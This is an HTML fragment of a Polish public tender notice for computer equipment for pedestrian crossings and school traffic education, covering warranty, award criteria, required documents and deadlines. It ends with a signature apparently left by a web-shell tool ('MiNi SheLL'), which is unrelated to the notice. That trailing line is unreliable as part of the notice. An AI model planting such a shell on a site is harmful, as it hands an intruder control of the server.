pieszy – doposażenie przejść dla pieszych i doposażenie szkół<br/>w zakresie edukacji komunikacyjnej.<br/>Szczegółowy opis sprzętu na każdą część zamówienia, jego ilość oraz miejsce, do którego<br/>należy dostarczyć sprzęt zawiera opis przedmiotu zamówienia, stanowiący załącznik nr 1 do<br/>SWZ.<br/>Zamawiający wymaga aby oferowany sprzęt stanowiący przedmiot niniejszego zamówienia<br/>był:<br/>a) produktami o wysokiej jakości, spełniającymi obowiązujące normy oraz wymagania<br/>Zamawiającego;<br/>b) fabrycznie nowy, nigdy wcześniej nie używany, nie dotknięty żadną wadą fizyczną, wolny<br/>od obciążeń prawami osób trzecich;<br/>c) kompletny wraz z potrzebnymi do działania przewodami, z odpowiednim<br/>oprogramowaniem oraz nie wymagał żadnych dodatkowych nakładów i był gotowy do<br/>pracy;<br/>d) zgodny z normami bezpieczeństwa (posiadał deklarację CE) oraz posiadał wymagane<br/>prawem atesty i certyfikaty jak również niezbędne instrukcje i materiały dotyczące<br/>użytkowania w języku polskim.<br/>Dostarczony danego rodzaju sprzęt w więcej niż jednym egzemplarzu musi pochodzić od<br/>jednego producenta. Na dostarczony sprzęt Wykonawca udzieli gwarancji na minimalny okres<br/>30 miesięcy, maksymalny okres 60 miesięcy. Liczony od daty odbioru całkowitego, niezależnie<br/>od długości gwarancji udzielonej przez producenta.<br/>Wykonawca w cenie oferty musi uwzględnić wszystkie koszty związane z wykonaniem<br/>przedmiotu zmówienia, a w szczególności koszty dostarczenia, załadunku, rozładunku,<br/>montażu w wyznaczonych pomieszczeniach, sprawdzenia funkcjonalności sprzętu (pierwsze<br/>uruchomienie) oraz zapewni przeszkolenie w zakresie funkcji i obsługi zakupionego sprzętu.<br/>Zamawiający wymaga, aby Wykonawca był uprawniony do wprowadzania do obrotu<br/>wszelkiego oprogramowania wchodzącego w skład przedmiotu zamówienia.<br/>Szczegółowe warunki dostawy, gwarancji, sposób zapłaty za dostarczony sprzęt i obowiązki<br/>stron zawiera wzór umowy stanowiący załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 44275,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która otrzyma największą łączną ilość punktów w oparciu o ustalone kryteria, zostanie<br/>uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością<br/>uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień<br/>złożenia nw. podmiotowych środków dowodowych oraz innych dokumentów:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - w celu<br/>potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z ww. dokumentów, Zamawiający żąda od Wykonawcy<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>Wykonawcy.<br/>Wymóg złożenia ww. dokumentów stosuje się odpowiednio do osoby działającej w imieniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz osoby<br/>działającej w imieniu podmiotu udostępniającego zasoby.<br/>Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może<br/>je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca<br/>wskazał dane umożliwiające dostęp do tych dokumentów.<br/>W przypadku wskazania przez Wykonawcę dostępności ww. dokumentów pod określonymi<br/>adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może<br/>żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie<br/>przez Zamawiającego dokumentów;<br/>b) oświadczenia Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia dotyczące przesłanek wykluczenia z art. 7 ust. 1 ustawy o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego składane na podstawie art. 125 ust. 1 ustawy Pzp.<br/>Więcej w pkt 7 SWZ.<br/>Oferta na poszczególną część zamówienia winna zawierać co najmniej:<br/>1) wypełniony interaktywny „Formularz Ofertowy”<br/>2) szczegółowy formularz cenowy,<br/>3) wypełniony formularz oświadczeń – załączniki nr 2,<br/>4) uzasadnienie zastrzeżonych w ofercie informacji stanowiących tajemnicę<br/>przedsiębiorstwa, jeśli dotyczy (zgodnie z pkt 12 ppkt 16 SWZ),<br/>5) pełnomocnictwo – jeżeli zostało ustanowione, bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie (zgodnie z pkt 7 ppkt 5 SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się<br/>odpowiednio do Wykonawców, o których mowa wyżej.<br/>Podstawy dotyczące wykluczenia wskazane w niniejszej SWZ każdy z Wykonawców musi<br/>wykazać odrębnie w składanej ofercie (dotyczy oświadczeń i deklaracji), czy w trakcie<br/>procedury badania i oceny ofert.<br/>Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, została<br/>wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>umowy regulującej współpracę tych Wykonawców.<br/>Wykonawcy składający ofertę wspólną mają obowiązek w formularzu „OFERTA” dokładnie<br/>wskazać dane (nazwa firmy, adres) wszystkich Wykonawców.<br/>Zasady składania ofert wspólnych regulują zapisy pkt 12 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszcza się nw. zmiany postanowień zawartej umowy na część I-III zamówienia, które<br/>nie mogą prowadzić do zmiany charakteru umowy:<br/>a) zmiana wynagrodzenia Wykonawcy (cena) o kwotę wynikającą ze zmienionych stawek<br/>podatku VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania<br/>umowy;<br/>b) zmiany personelu Wykonawcy;<br/>c) zmiany personelu Zamawiającego;<br/>d) zmiany części zamówienia, którą wykonują podwykonawcy;<br/>e) zmiany terminu realizacji przedmiotu umowy wynikająca z wystąpienia okoliczności na<br/>które Zamawiający i/lub Wykonawca nie miał wpływu i nie mógł ich przewidzieć na czas<br/>realizacji zamówienia, a które w istotny sposób wpływają na obopólne zobowiązania<br/>Zamawiającego i Wykonawcy, w przypadku zmiany przepisów prawa istotnych dla realizacji<br/>zamówienia, zmian gospodarczych i ustrojowych oraz w przypadku wystąpienia tzw. siły<br/>wyższej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-30 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com